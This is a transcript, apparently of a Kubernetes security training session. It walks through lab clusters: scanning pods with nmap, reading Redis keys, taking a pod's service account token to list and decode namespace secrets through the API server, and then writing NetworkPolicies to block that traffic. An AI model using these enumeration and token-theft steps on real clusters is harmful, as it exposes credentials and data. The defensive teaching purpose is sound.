This is a char, well, it's...
This is for checking 3D levels, installation.
So there are a lot of stuff here.
And in user being, there are different tools.
Let's see if there is an end map.
Yeah, there is an end map.
For example, have you ever used it?
Are you familiar with it?
Okay, Nikto, Nikto is a URL scanner.
I mean, this is able to process our site.
So it may, for example, this may work with the first lab.
Okay.
There is another one that you checked here.
I have to check if it's here.
Yeah, there is another tool, scene map.
Which is,
which is, it's similar to the end map.
What else we can see?
For example, we can, let's see if we have IP,
IP address show.
So with IP address show, you can
see what IP address does this container has.
So you can see the network.
So what you can do is let's do an end map SP.
I recall what, 2.4.0.0.0.24.
Let's do,
let's see what other hosts are we able to see.
So we were able to see 16 hosts.
Yeah.
Let's try what address do you have there.
With IP AS, you can see.
So in this scenario, what we have is,
I mean, if I'm a hacker and I'm trying to understand
the network I have access to,
what I will do is first look at the IP range,
which is what we just did.
Then let's see what other machines are available.
And here you will see a lot of stuff.
And actually what I want us to see is that
we are in this container and in this container, sorry,
and we are mapping all the cluster.
And we were able to see,
if we take a look at the dashboard,
the namespaces here.
You can duplicate this tab so you don't lose the shot.
With right button, duplicate tab.
Take the duplicate tab, okay.
And that's where the namespaces are.
Okay, here, cluster namespaces.
So there is this, all of these namespaces,
one, two, three, four, five, six, seven, eight namespaces.
And if I take a look at the pods,
each namespace has several pods, pods, sorry.
So what we did here was,
we enumerate all those pods,
or the one that we were able to see.
And you can see that we are in the namespace,
this container, but we are seeing stuff
from the dashboard namespace,
from the World's Chrome, from the HOOP Keep system.
Actually, what we are seeing here,
this is super important to understand.
This is the service discovery
domain name standard.
Every cluster, any cluster, Kubernetes cluster,
it always will be service cluster.local,
as its domain name.
And it will have the namespace,
and it will have the application,
or the service, or the pods that is running here.
In this case, it's showing us as well the IP address.
So whenever you see this,
you will be able to understand that
this specific IP address, it's at this namespace,
and it corresponds to this pods, or to this deployment.
So we are seeing in the Kubernetes dashboard,
the default, these services,
which are at the default namespace.
These are from the Qubes system namespace.
Let's see.
It sounds all of those.
Yeah.
So for example, if we want to explore,
if we want to explore
a specific, for example, we will,
it's so common in Kubernetes to have MongoDB's databases,
or have Elasticsearch,
or have a MySQL, or Redis, or wherever.
So you can scan all the network
looking from a specific port, for example.
Within that map, we can do that.
We're going to try CMAP,
and we're going to look the Redis port,
which is this example for this lab,
but we can look, can you see?
Ah, sorry, and this is the network to 44.0.0.
This is able to create a file, a CSV file,
with the information.
So let's run it.
Wait, we need to just,
the file, I'm not sure if there is a VIN here, let's see.
If not, we just use a macro, that's it.
Okay, it's V.
The blackest.
Yeah, I'm shooting.
I think, perhaps it's because of this.
I just commented the file.
Wait, are you familiar with V?
Okay, cool.
Yeah, okay.
We all went through that, trying to escape V.
So, okay.
Okay, so this is scanning,
and the open file,
it shows us where is that ID.
So we can use nmap, if I remember correctly,
is a sp, the same part.
6, 3, 7, 9, and I don't remember the syntax.
This here is, I think it's the same.
It's the same.
Yeah.
Yeah.
Oh, we're good on time.
So, but this is the difference with the cmap,
which is kind of cooler.
Yeah.
Easier to read, because it only shows you
which one is open.
Yeah.
But we can, for example, let's try with the cmap,
where we're in the 80s.
Okay, and it shows that there is three open ports
in different hosts.
We can, I'm not sure if hosts, yeah,
it hosts here, so I can try to get the name of those IPs.
So I will understand what are they,
because I mean, this is so descriptive,
the idea that you're deploying your application
has a frontend, backend, database.
So usually the database will be called Mongo,
or MySQL, or Postgres will be the name
for this deployment.
The backend usually is called backend,
or perhaps the name of the microservice,
if you have several microservices,
and it's descriptive because it shows what it does,
OCR or authorization, whatever.
So analyzing that, you will get more insights
about your system.
So.
And this is, I mean, obviously applying this
to our own systems actually is super cool
because we do like an insider,
and you will be able to discover what is happening inside.
So let's see, in this case, this is a middleware,
this is a service called cache store,
so it has information.
As we were looking for Redis specifically,
we can, it can be a Mongo,
I don't think, I don't believe that there is a Mongo here,
but we are going just to connect to that Redis,
and it's there.
So if I want to see,
let's keys.
So for example, this is, these are the keys saved on Redis,
and if you want to get that,
you will be able to have it.
So you can like,
explore and obtain the information
that you are looking for.
So let's see if you can connect there too.
This is a,
this is,
this is,
yeah, is there something like passwords?
Yeah, exactly.
So it may be some passwords or something like that.
So let's do our last lab of this kind of last.
We're going to do a role-based access control
misconfiguration.
So we're going to see what happens
when we don't have a properly configured
role-based access controls here.
So let me show you.
So the idea here is we're going to talk
with the API service server using the REST API,
and I mean, do what we have already done,
but checking the role-based access,
see how to access it, permissive permission,
or misconfigured permission,
allow us to gain access to more information
within our cluster.
So in order to do that,
we are going to this,
this scenario,
which is running in the port 1236.
So let's go to localhost,
1236.
So this is also super common because, I mean,
we tend to give users more privileges
than they really require.
So just because, I mean, I've been so granular
sometimes it's so cumbersome,
so you just give the root access
or the high level access.
So we're going to see
what do we have here.
So in this case, let's see the environment
in this print file,
in this deployment.
So the print environment show us
like the variables, define it.
Let's see if we see something interesting here.
Obviously this is running with roots.
The idea here is to find a secret,
that is not properly,
I mean, that is accessible to everyone
because the role-based access control privileges are wrong.
So there is one of them,
let me show you here,
I'm going to jump.
Let me show you this.
Here.
So in Kubernetes,
and there are no like a new server account percent,
what we have is service accounts.
So these service accounts are using,
I will say by everyone,
by every kind of object or resource.
But at the end, one of those objects are us, the humans.
Other objects are the bots, for example, or applications.
So a service account,
it's something that is authorized by the API server
when it comes from a bot,
which uses that.
So each bot, when it tries to request something
or to report something via the Kiblet,
needs to be authenticated
and that is done by the service account.
So by default, every bot uses the default service account
for the cluster.
So there is like one service account,
well, actually like two or three service accounts
for the whole cluster to handle the access
to, for example, the registry where the images are,
to the API server,
to any other service within the cluster.
So these service accounts usually are associated
with the cluster, with the namespace,
are tied with a role that gives like the scope of action
of that service account,
which is what I want to show you.
Usually the token for these service accounts
is stored at this location.
Yeah, if VaronSecrets or QNets service accounts
or a similar location as well.
So what we are going to do here is let's find this.
So this is like a standard for every container.
So here, secrets.
VaronSecrets.
Service account.
And here it runs.
There are these service accounts.
This information here, there is the certificate,
the CI, and there is the token.
The token is like the password,
like the way to access that user.
So having this token give us power
or give us control over the API server.
If the token has enough privileges
or the role that it has associated with
has enough privileges, we can do anything.
I mean, wherever it's available.
So that is why it's important
like to have the less privileges possible.
So let's see.
So first let's-
But there's no need to avoid
storing token in a location.
No, no, because it's needed by the bot
to request anything to keep led or to report anything.
So what needs to be done is that
that token only gives access, for example,
to this namespace, to this bot,
to do, to read or to send this information
and nothing else.
So not access.
I mean, this token should not be able to have the power
to create another deployment for just to give an example.
Okay, so this is the token.
That is there.
And let me check because what do we need here?
Let me go here again.
We need to be able to talk with the API server
to communicate using to let to the API server.
The API server requests us token to work.
So what we will need to know is where is this API server?
We don't know.
We need to like an IP.
Usually the port is a standard.
So we will need to do that.
So let's see.
So, okay, training environment.
It can be here, I guess.
QNetservice part.
Okay, QNetservice cost.
Yeah.
This that should be the API server.
We can check with scope.
HTTP as, as long as this API address.
The port it says where is it.
The port is 443.
Let's see if we can see.
Okay, it says that the certificate is not valid.
So we need to dash K.
Okay.
We are not able to access the API server
without authentication.
It's forbidden.
So we need to authenticate.
So what we are going to do is to using call authenticate.
So first we need the certificate.
Which is, what is the one?
Sequence, QNetservice account.
So there is this certificate.
This, in order to connect to the API server,
we need to send the token in the header.
Like probably you're from,
you're, are you familiar with JW token, for example?
Yeah.
Okay, so it's kind of similar to that.
So in this case, we are going to use
the authorization here.
We are going to send the token and see what it is.
However, let me save the token in a variable
because it's too big to paste here.
So, okay.
So let's export, okay.
One, two, three, four, five, six, seven, eight.
I don't have, let's see.
I'm going to come out.
I need, it doesn't let me,
the parent prefix.
Ha ha ha.
What else can I do?
Okay, I think this is all.
Okay, I have it here.
I can copy it from here, I guess.
So let me see this.
It's not typing.
It's not typing.
It's not typing.
It's not typing.
It's not typing.
You know what?
I guess that we can access the same container from the side
because I'm going to open another tab
and let's see.
Kimctl, good parts.
What's the name?
Hungry check deployment.
Is that the?
What's that?
What's that?
What's that?
Oh, that's, that's checking.
Yeah, and it's hunger.
Let's see.
I can see the IP address is here.
Ah, no, I know.
Perhaps it's in another, in a different namespace.
Oh yeah, it's here.
Big monolith.
So let's connect here because we need to be able to copy.
So this will be gctl,
accept-it,
the name of the pod,
dash, dash, and let's see dash.
The name is going to change.
Yeah, okay.
Okay, I missed the,
where should I put that?
Man with monolith.
What is it?
Perhaps it's,
okay, yeah.
So,
okay, okay.
So we are here.
Let's confirm that we are here.
Yeah, R4, R4 is busy.
Okay.
Okay.
Let's,
wrong, wrong.
Where's it, that one, secrets, secrets.
That one, secrets.
Okay.
Okay, yeah.
Now we can do it.
So, export, talking,
info,
sign roller,
parentheses,
touch right.
Let's see with echo, sign roller token,
it should show us, yeah, it's working.
Let me, okay, this one here.
So,
works.
Okay, and we need,
I need to remember the IP address for the,
for the service cards.
So, okay, let's go.
Call,
dash, dash,
CSRT,
CSRT,
and var, wrong,
secret,
secret,
keyword, service account,
CSRT, okay.
No, here though.
And,
this is kind of nightmare.
I need,
where is it?
Let's see.
There are some,
keys that doesn't work.
I'm not sure why.
This,
is too fast.
Okay.
Let's see if it works.
Oh yeah, it worked.
So, authorization,
var,
dollar sign,
forgot the name of this.
Okay.
Flash,
X,
get,
and here we go,
HTTPS,
this is it.
And,
and this,
this is,
slash, API.
Okay.
Okay.
Yeah.
Okay.
So, let's try again.
Oh, it worked.
This,
wrong, this,
yes.
So,
and slash.
This is like internal resolution of the server.
Yeah.
It's showing us, I mean,
we are just seeing here like this API,
and the clients, the server address,
but now we need to see what else we can do.
So, for example, I mean, the API is this,
where we want to store is this.
So, I can do,
all the objects that are here,
we can try to see them,
API core,
service,
in fact, let me,
I mean, the most valuable scene,
or one of the most valuable scenes that I may find
in our Kubernetes cluster in the API are the secrets.
So, let's see, where are they?
Here.
Secrets.
So, it's API,
API version one,
kind of secret.
That's like the path.
So, it was, let's try.
API version one, secrets.
It's forbidden.
So, it's forbidden.
So, the scope of this token
doesn't allow, allows us to list these resource.
So, actually, when you create a service account,
you have like these verbs,
which is what we can do.
So, list, read, write, stuff like that is what you can do.
Let's try another one.
So, again, I can go here.
Okay, let's try to find, for example,
the, where are they?
Okay, just resources.
The namespaces.
So, it's version one namespace.
So,
API version one,
namespaces.
Oh, it's forbidden as well.
So,
no, wait.
Okay, let's try this namespace.
Our namespace was
namespace.
It's here.
Where are, secrets, pyramids, namespace.
It's written one note.
Okay, API version one namespaces, namespace.
Probably, we know the secret name we'll be able to.
Yes, that's true.
We're going to write it.
Use one on all leads.
Pick one on all leads and
the secrets is actually what we were talking about.
Okay, so, our, the scope of this token,
it's confined to the namespace.
So, we can see, okay, let's see what,
what stuff we can see from this namespace
and the secrets will be interesting to know.
So, here we'll define,
for example, this webhook API key.
So, we were able to get an API key.
And also, it's born with the API key.
Yeah, the bold API key, which is,
I mean, if I have the common way to encrypt a secret,
is to store that in a vault.
But if I am able to get the vault API key access,
I may have a problem there.
And let's see another one thing here.
The bugs, for example.
So, it shows us the bugs that we have.
Actually, we can't prettify this with 5jq.
If you want to install,
ah, sorry, forget about it.
We are inside the container, I forgot.
So, there is, no.
Let's see what else we can see, services, yeah.
So, basically, we can do a lot of stuff
inside this namespace in this particular case.
Yeah.
Now, let's go back to the secrets and let's do this.
It turns out, are you familiar with this?
Like this.
Nice and simple.
Yeah, with this codification.
So, this is,
this is a base64 codification,
which is the encoding standard
for secrets in Kubernetes.
So, that is not an encryption, but that's a codification.
So, it goes in both sense, yes, in both directions.
So, with this common, I'm able to decode the coding.
So, I, but we are able to get the,
in this case, the key.
And they were put at the key
and I can do the same with this.
Although, I think it's the same.
Oh yeah, it's the same, I don't know.
Oh, it's different.
It's a different, yeah.
Yeah, this is, yeah.
So, there it goes.
So, we have the,
we have the what?
The secret decoded.
So, for example, if the secret were the key of a certificate,
I mean, the secret, you will have the key, the CRT.
So, you will have the certificates available
for you to work with.
Okay, so let's move on.
So, we've got the lab for the image.
We have the lab for the privileges.
We have the lab for the networking policies.
We just have lab for the well-reserved access control.
So, let's do,
let's do, let's work with, let's start.
I'm going to start with the network policies.
And we are going to start building on top of that.
Let me look for that.
So, network policies.
So, the network policy.
Okay, well, let's start saying this.
We already established that the network
inside a Kubernetes cluster is flat
and that you can jump from one container,
which is in a specific namespace,
to another container, which is in another namespace.
I mean, at least you have connectivity.
So, you can, for example, what we did
within the database that was in other namespace
from the namespace I was running my containers.
So, everyone is able to see with each other.
So, let's analyze that a little bit.
If I have a cluster, and in this cluster,
I have a development environment,
a production environment, a QI environment
in the same cluster, and these namespaces,
or we are using the standard network for Kubernetes,
we will face the issue that, for example,
production gets hacked, gets compromised,
and or development gets compromised.
Perhaps it's easier, or QI, it's easier,
it's exposed or something, and from there,
they can jump to production or access production
or access data, which is in production.
So, that it's the worst case scenario.
Or within the same company, if it's a big company,
perhaps someone can access to a different namespace
with different information that you don't really want
for them to access.
So, we need to implement network policies.
That is the reason why I am starting here,
because it's the most effective way
to start securing your Kubernetes cluster.
This policy behaves like a firewall.
So, it's a firewall that blocks the communication
between the pods.
It can be applied to pods within the same namespace.
I can apply using labels.
I can create ingress rules, egress rules,
and the traffic that goes to the pods,
or that exits the pods.
I can create a policy for a specific port,
but in order for this to work,
I will require to use our container network
interface plugin in order to enforce these policies.
By default, they don't do anything
if I'm not using a plugin.
So, let's, well, let's advance a little bit.
So, this is a repo.
Actually, I'm going to take a repo to put this inside.
This has a lot of recipes for different network policies,
because, I mean, these policies varies a lot
depending on your application.
I mean, depending on the complexity of your application,
if you have an application with five, with 10,
with 100 microservices,
the simplest way to approach that,
which is the most common, is that within the namespace,
you don't apply any policy.
So, any pod, any service can communicate
with any other service on micro or container
within that namespace.
But perhaps that's not wise,
because it's possible that you have like your data backend,
and you have like some middleware,
and you have a frontend,
and if your frontend is able to connect
to the data backend directly,
I mean, there can be a data leak
if there is any vulnerability in your application.
So, and let's be clear with that.
Here with Kubernetes, you must assume
that your applications exposed to the internet
are vulnerable, and they can be compromised.
So, you need to act like if that were a fact,
but if that was a fact,
so that's the way, the mindset that you need to have, right?
So, in this example, or in this diagram,
what we see is that we have a frontend
with the application web,
and the external traffic is able to access here,
but is not able to access the other applications.
And the application is able to access
these other applications, these are our labels,
full and bar, but they are not able to communicate
with each other, this is like an idea.
So, there are some comments
that we are going to explore after that.
So, there are certain recommendations,
the ideas that you don't want to allow
all the traffic to come in,
you want to be selected in which traffic you want to receive,
you don't want to allow in-bus traffic between the pods,
the ideas that you specify which are the flows
that you want to see within your application.
This, you need to be careful here
because if we block Qt system, for example,
from other namespaces,
we won't be able to reach the API server, for example,
and we won't be able to work,
so we are going to block our cluster,
which is not what I want.
Another thing which is more advanced,
but it's important, is that you don't want to allow
your pods to access the internet.
And if you take a look, I mean,
why, I mean, if you design an application,
a service that is small enough to run in a container
which has only the basics,
does this application needs to access the internet
for anything?
It's like the question that you need to ask yourself.
The 90 X percent of times, the answer is no,
there is no need to access the internet at all.
So the idea is to block any outgoing traffic from your pods
only what is needed, for example,
to access the egress traffic that is going to another pod
to the backend, for example,
if it's different, that's allowed, or so there.
So how does egress matter?
I mean, as long as we are blocking the egress,
like no one should be able to access
or the traffic should come inside.
Even if egress is open, how does that matter?
Yeah, because actually the lab that we're going to do
deals exactly with that situation.
I restrict the egress, but if I have an egress,
I can, for example, install something on my container.
Yeah, so I mean, you restrict the egress
and you only allow for the frontend service
to be accessed by the users,
but the frontend has a vulnerability that's exploited.
With this vulnerability, they are able to make this service,
this container, to download something, a payload,
and execute it, which is exactly the way
that a compromise is done.
Exploit something and make it download a payload.
So this is the situation where you don't want
any egress traffic to available here.
So we are going to do that.
There are other approaches,
allow only egress within the cluster,
but not to the internet,
and certain pods that really need access to internet
allow them to work.
We can work with IP addresses, but it's hard to handle,
so it's better to use main spaces or labels
to help this stuff.
In the case of Qt system, it's dangerous.
I mean, you need to do it carefully,
because if you do it, you can block your cluster
for working, so it's important to take that
so your egress needs to be able to receive
external requests, must be able to access the DNS
to resolve the service discovery.
The DNS needs to go outside
if it's doing some forwarding requests.
The monitoring tools, QNets,
it's everything about monitoring the stuff that you have,
so which usually is from others,
so it will require that access.
If you're using operators like for backup or certificates
or something else, they will need probably to access that.
We're going to do this, but usually you need to restart
the service for the net policy to apply.
We need to do some tricks sometimes
to make it work with labels,
because not all the resources, the objects
are able to use that.
The API, handling the API server has its complexity,
and some plugins don't work well with the policies,
so you need to be careful.
We are going to use, there are several ones
where you are going to use Calico,
which is the one that is being used by Amazon,
Azure, Google, by every provider, so it's okay.
There is another way, which is to use the service mesh,
like EatsT, which is a higher level,
higher layer filter.
But what we are going to do, I think it's,
so we're going to do, to execute this lab.
So this lab, we're going to move to a different cluster,
we are going to leave both behind,
and in this other cluster, we have a cube system,
we have an Ingress controller, which is called Trophic,
it's similar to NGeeks, for example,
that is an alternative,
and we are going to have two names, two namespaces,
one called default, the other one called production,
default will have a web console,
which is like the ones that we have been using,
so we can access remotely when we work,
and we're going to see that this different namespace
is able to access production to this node SQL client,
to this MongoDB database directly,
and then we're going to start applying the Ingress policy,
see how it affects,
and this other namespace called production
has a frontend called node SQL client,
which is a web frontend for Mongo,
it's kind of beautiful,
and it has a MongoDB access as well.
And there is some other stuff around this,
which is the monitoring from a service specifically,
I mean, from a service is cropping these deployments
to gather information and graph the graph feed
and show us the information,
so we will check that as well.
So let's begin, let me check here, one second.
Yeah, so let's move here,
I'm just going to open a new tab,
let's go to the Netball directory,
here in KAN security labs Netball,
so here we have a folder with the network policies
that we are going to implement,
and let me check one thing,
do you want to go for a break?
You're fine.
You're fine, okay, so we can finish earlier then.
We are going to do this now and that's it.
Okay, ready, so,
right, okay, so these are the policies
that we are going to implement,
but before doing that,
in the cluster that we have,
we are using the full network,
so it's not, I mean, it's open
and it doesn't have the plugin that enforces the policies,
so we're going to check that.
So let's move to the other cluster with QCTX,
execute QCTX, and let's move to Netball, QCTX,
and Netball.
Okay, so we are in this cluster,
let's check first QCTL,
we have all main spaces,
oh no, it already shows the,
the what, the plugin, oh,
I installed, okay,
so this is the cluster, if you take a look,
it's kind of big,
I mean, if you, we can see the nodes,
this has the nodes, the nodes,
the worker and the control plane,
and it has, let's see,
let's see the ingress, the ingress,
all main spaces,
oh, it doesn't have the traffic installed yet,
let me check one second, please.
Okay, so we need to execute a script that we are missing,
so let's go to this directory,
so let's make sure,
yeah, okay,
and we need to go to the Netball policies directory,
and there is this apply script,
this script, what this script is going to do
is to deploy this, plus the Prometheus
and the monitoring stuff, the traffic,
the web console, all of this,
which is not installed yet.
So yes, we are going to say yes,
we take away,
no, we are having to set them too much,
let's see what is happening,
it seems like I've been seeing an error here,
let's see,
let me do this,
and there is some issue with the network,
oh, I didn't read that,
it's running the same thing over and over again.
Yeah, it's, but it's not, let me see,
because perhaps I did miss the,
the network installation,
ah, finally, I'm not sure what it was because of the JQ,
did you control C then installation or?
Yeah, we run again, the apply,
it was because of the JQ,
okay, so it's good,
okay, so let's see, okay, let's see what we have,
and let's go to the,
you should have a keyword net dashboard,
Firefox, we will need to get the secret,
execute this comment,
so you can have your token,
okay,
so you can log in here,
oh, it's not working,
let's create a new one,
I don't know, you know what,
I'm missing the QCTO proxy,
come on,
ah, it's running from the previous one,
yeah, yeah, yeah, so we need to stop it,
and run it again,
and reload this because this was pointing
to the other cluster,
okay, so,
that's okay, so,
okay, so we have the web console,
we're going to see it,
we're gonna view the services,
and deployments,
we're gonna show the web console,
okay, we're just seeing the deployment space,
in this is the traffic,
which is the dashboard,
which is the dashboard for the Ingress controller,
the web console,
the from a TV server,
the non SQL client,
which are the deployments,
these are the deployments,
and the services,
and everything,
so,
what we are going to do is the following,
so,
the Ingress controller,
the traffic is giving us access,
to each one of those services,
and by their names,
so,
we are going to try,
let me check here,
and first,
it shows traffic as one of,
I used to,
so,
it's traffic,
HTTP,
okay, so,
it asks for user and password,
it's admin,
one to five,
one to,
sorry, what is that?
One to five,
one to three, four, five.
Okay, okay,
gone, gone,
just give me one sec,
I'll get some. Yeah, sure.
So,
that,
so,
sorry, what did I need to do?
Go to Firefox,
and traffic,
HTTP traffic,
no,
no, no, no,
don't use the IP address,
because
the Ingress controller is handling the names,
redirecting by name.
Oh, okay,
should I think,
traffic dashboard or just traffic?
Just traffic,
HTTP?
Yeah.
I don't like that,
I think it's just too bad.
Yeah, because it goes to Google if you don't type.
Okay.
Okay, so,
okay, so,
what we are seeing here,
it's the,
the,
the dashboard for traffic,
it show us the finance,
which are the ones accessible on the internet.
So, the promotees,
the traffic present,
the web console,
we're going to go there,
and the backends,
which are not accessible,
the no SQL client,
well,
there is a frontend for no SQL client,
promotees,
traffic,
web console,
the backends.
It show us the health of the,
of the ingress controller,
the errors,
the amount of errors,
all that.
It's super,
super basic.
So, let's open now the promotees,
HTTP,
promotees.
Admin one to five,
now let's open the no SQL client,
me,
admin one to two,
four, five.
And the web console will be the other one.
But just to remember,
we have,
we are here outside,
we have the traffic,
which is the ingress controller,
and what we are doing is,
if you take a look at the,
at the EPC host file,
it's all the same IP address, right?
Yeah.
So this is the,
this is the ingress IP address,
which is handled by traffic,
and when the request says web console,
it sends the traffic to the main space,
before with the web console application.
And if no SQL client,
it shows this.
And that's it.
So,
where do we see that these are all
different namespaces?
Yeah.
So, if we take a look in the Kubernetes,
we are going to see that,
for example, Prumirz use,
it's in the monitoring namespace,
Mongo and NoSQL are in production,
namespace,
and web console is in default,
and traffic is in system, yeah?
So this web console,
we can log in there,
with admin, one to five.
So,
this, this doesn't have either pinging,
it has call.
So,
we're going to do,
so this again,
we're here,
the namespace default.
Yeah?
Yeah.
And this is NoSQL client,
which is in this namespace,
is this one.
The NoSQL client can connect to MongoDB,
to,
well, as it's data I can.
So we're going to connect here,
just to check.
It show us the database, MongoDB,
and we can connect there.
So, it show us like the information,
and if we want to see the collections of databases,
to check what is in here.
So we execute,
and it shows us the array,
and we can explore,
it's hard to read it,
so the Star Wars characters, right?
So, and this is from it views,
and let's,
let's have some information here.
So let's,
let's ask for me this to show us the MongoDB connections.
So if we execute that,
it will show us like information
that it has gathered from,
from, from,
and it can graph that.
And I mean,
there is a lot of information here,
that we can execute,
yeah,
for everything.
I make sure there is something for the web,
also.
For our purposes,
what we're going to play with is with MongoDB.
Okay.
Okay, so what we're seeing here is that,
at least until this moment,
no obscure client,
this one has,
is able to see this one,
and this one is able to see everyone, yep?
So let's try the following.
From web console,
I'm going to,
to access other services.
So if you take a look
in our installation,
it seems that as there is so much,
garbage, I think that we need that.
Yeah.
Let me show you something.
We can see that here.
So let's go to the dashboard,
and,
and, and, and,
let me see.
Oh yeah.
So this is from a few server,
and we're looking for the host name.
I want to show you,
but I can't see it.
Well, we will need to build the name.
This is the, that's in our base dashboard.
I mean, it's not that good.
So anyway,
with call, which is here,
we can access
that from this server.
So the plumbing name,
main space monitoring,
and the rest is standard service,
cluster, local.
So if I execute a call,
well, it says,
just rough found so I can rough.
So the ESG is that we are testing connection
between,
between the main space default,
and our friends are the main space monitoring.
Now let's try with the,
with the QD system main space.
So again, with call,
epic.
Let me see it here, which one is it.
So in deployments,
there is,
I didn't see it.
Okay, it's here.
This is traffic from ethics,
which is the, like the service exposed to,
in order to, for promise you to scrub the metrics
that it needs to grab and monitor all the stuff.
So this is traffic from this QD system is the,
is the place,
the main space.
So traffic,
dash,
dash system,
service,
master,
local,
and the port here is 9100.
And let's check here.
You can see here.
Okay.
Let's see it like this.
There is nothing fun.
So we go to metrics, which is the,
and these are,
these are all the metrics that from it use the scrubs
and saves.
Actually we can take a look here,
traffic.
It shows us these are the,
actually that's, we can see how,
how it works.
So we have connected to do to,
from web console to,
to traffic and to monitoring.
We are missing production.
So let's try connect to production.
So in order to do that,
we are going to connect to the database directly.
So we are going to rewind here.
So in order to do that,
we are going to install some software.
So the Mongo plan.
So I'm going to paste the,
the comments here for you.
With control B,
it's able to,
to find the place to kill.
Yeah.
For something that I just,
So,
it's,
it's very good.
With control B.
Okay.
Perfect.
It works for you too.
And now we are going to,
we are going to,
to execute.
To move,
move the binary,
to MP.
And now we're going to execute this,
Mongo client,
to access the database.
Okay.
Okay.
And it works because we are seeing the R2D2
and all the,
all the objects,
the JSON objects that are stored there.
Okay.
Okay. Perfect.
So,
okay.
So now we have established it,
that we do have connection with all the,
spaces.
So we are ready to create our first OEC.
So let's go here.
So,
let's go again to the,
because we are going to modify the files.
So the best thing that we can do is go to,
to see and copy the network policies
from our labs directory.
So K8S security,
pass,
and network,
network policies.
Let me copy this for you.
And go inside that directory,
and open the Visual Studio Code,
all the space that.
Okay.
We are the last, yes.
Perfect.
Okay. Awesome.
So let's open the file,
Ingress Production Deny, Deny Out.
So this is our local,
super simple.
It's,
it's the,
okay.
The API version networking version one,
the kind of object network policy.
The native divider is the main,
the main space,
which is being applied this policy.
The specification is this one,
pod selector and Ingress.
So what this,
this means that it will choose any pod selector
that matches this,
this filter, this expression.
And as the expression is blank, is empty,
it will match everything.
Yeah.
And Ingress is the same.
This will be like the rules that allow traffic,
the traffic to reach the pods selected for these,
for this pod.
Actually, I just say in the wrong way.
This is empty, so there won't be any pods.
And these rules are empty.
So there are no,
there is not going to,
there is not any,
there are, there is no rule
that allows the traffic to enter.
Yeah.
So this, this,
this policy, what it does at the end
is to block the traffic
that comes inside the production space.
So we're going,
inside the Visual Studio Code,
go to terminal and open any terminal.
We're going to do it from there.
We're going to apply that policy from there.
So it's,
it's easier to see what we are doing.
So we keep CTL, apply.
Oh, before applying,
let's execute get netpol.
All name and spaces.
But there is, there is no network policy yet.
There are no network policies yet.
And now we are going to apply this policy.
Apply.
Touch F,
one in this production,
the netpol.
And let's see, it should show up.
Yeah, it's there.
Mm-hmm.
It doesn't have out.
It's one dash in this production.
No, I wasn't in the correct.
Ah, yeah, okay.
That is right.
Actually, yeah.
Awesome.
And run again the get netpol.
And it should be there.
Let's go to the dashboard and see.
Here's there.
So in the dashboard,
at the end, you will see network policies in cluster.
Oh, I lost the pink one.
Yeah, so network policies.
Go to clusters, network policies.
Yeah.
And go inside,
and it doesn't show much.
You can just see that.
And let's try.
Let's try to see.
Let's go to traffic.
Let's reload.
So it doesn't seem,
it seems that,
it seems the same as before,
from here at least.
Let's go to no-sql-client,
and check if you can execute query.
So it kind of gets stuck.
So let's reload no-sql-client.
And it shows that it's not connected.
Reload it in webpage.
Okay.
Try to connect again.
Yeah.
So it gets stuck,
and it shows a gateway timeout.
Yeah.
Click on the connect button at the top right.
Okay, yeah, we got it.
And if we go to Prometheus,
and try to execute the Mongo connections,
let's see.
Well, this is the same with Prometheus,
that it needs to be restarted, I think.
To take into effect this,
let's try again.
I mean, Prometheus,
it's not respecting the policy yet.
So we can restart it,
just to force the,
it applies its respect there.
There are others, so let me restart it.
Let's see if it applies.
It takes a while sometimes.
Okay.
And in the meantime,
let's go to our web console.
And let's try to connect again to the database.
We have the, in the Q3, we have the points, so.
We just need to.
Okay.
So it should show a connection file.
Yeah, should we try it on this again?
Yeah, we can try.
No, not yet.
All right, it keeps.
Yeah, it's still really,
we may have to restart the other containers.
But the one that I want you to check
is from web console,
try to execute the query to the MongoDB.
Yeah, I tried that.
Okay, perfect.
And let's try the call MongoDB is in production.
And we, the policy that we applied was only to production.
So let's try with call.
The promulg is the traffic from this, it should work
as well as the.
And we can execute another call again,
the no-sql client as well.
From you, sir.
Yeah.
You can add slash metrics to that call.
Yeah.
So it shows you more information.
And let's try to access the no-client,
the no-sql client.
Yeah, it should be.
It should be something like phone, no-sql client,
production, service cluster local.
We didn't do this before, sir.
Yeah.
So.
So this is restricting everything
and so we can be less restrictive about
which parts can be small.
Yeah, exactly.
We are going to, well, we are not to finish today
all the focuses, but we are going to add a pin one.
Because right now, if you notice, we have,
I mean, our application is not working.
Because probably our application should be,
should be the idea is that we want
the application to be accessible.
Correct.
So actually let's do that.
So let's open the Ingress Production
Allow Effect No-Sql Client.
Because what is happening?
We create a policy that blocks
all incoming traffic to production.
So traffic is not able to reach no-sql client.
The web console is not able to access any of those.
And this is okay, actually.
This, we don't want web console to access here.
But we do want that traffic access.
Actually, we don't want traffic to access MongoDB.
We want traffic to access no-sql client, specifically.
Which is the front end, right?
Yeah.
So let's do that.
So the second policy, the Ingress Production
Allow Traffic No-Sql Client.
Let's take a look.
So the name, the namespace, and here it comes.
So the specification.
PodSelector match label no-sql client.
And if we take a look here at the dashboard,
it's PodSelector match label, right?
So PodSelector match label.
So this is our pod, no-sql client.
And you can see the labels, it's here.
The label is wrong, no-sql client.
Okay.
Yeah, so this is the way I match that pod.
Right?
Now, for Ingress, what you just asked,
which ports I'm going to allow to access.
So we want the port 3000, because we take a look
here in services, the no-sql client.
Let's see.
It's here, it's the port 3000.
Okay.
So when we didn't apply the Ingress.
It will allow all the ports, any port.
So wasn't that port 18?
Was that still 3000?
No, actually no, because what we are accessing here
is the tri-fix Ingress controller.
Okay.
And the tri-fix is redirecting that.
Got it.
Yeah, yeah, yeah, okay.
Understood.
And what else?
I think that's it.
And.
And from, okay, so now we are specifying
the traffic where it's coming from.
Because, I mean, we want that production
is able to receive incoming traffic,
but we only want that incoming traffic
to come from this application traffic,
which is the namespace system.
So we say here, from namespace selector,
match label namespace to system.
So if we go here to the dashboard to namespaces,
I think here is the label namespace to the system, right?
So just imagine namespace,
or label developing or QR production or whatever.
So the labels are like a team to manage
the all these kind of policies and rules.
And once we select the namespace,
we select which port we want.
In this case is traffic, app traffic.
So we go there, app port, port.
So I think it's somewhere around here.
It's here, traffic, app traffic, right?
Yeah.
And that's it.
That's it.
So let's apply this.
This is once we get the port we can check,
we see that it's one.
And let's try.
Let's see if this works for no SQL.
So will this override the denial that we had applied or?
It will override, but for the specific traffic
that comes from key system traffic
and wants to access production no SQL client.
In fact, if you reload, you will see that we can see again
the front end.
Apply the, apply the.
Now let's try to connect to MongoDB.
It's still not working, right?
Because we, I mean, we have still,
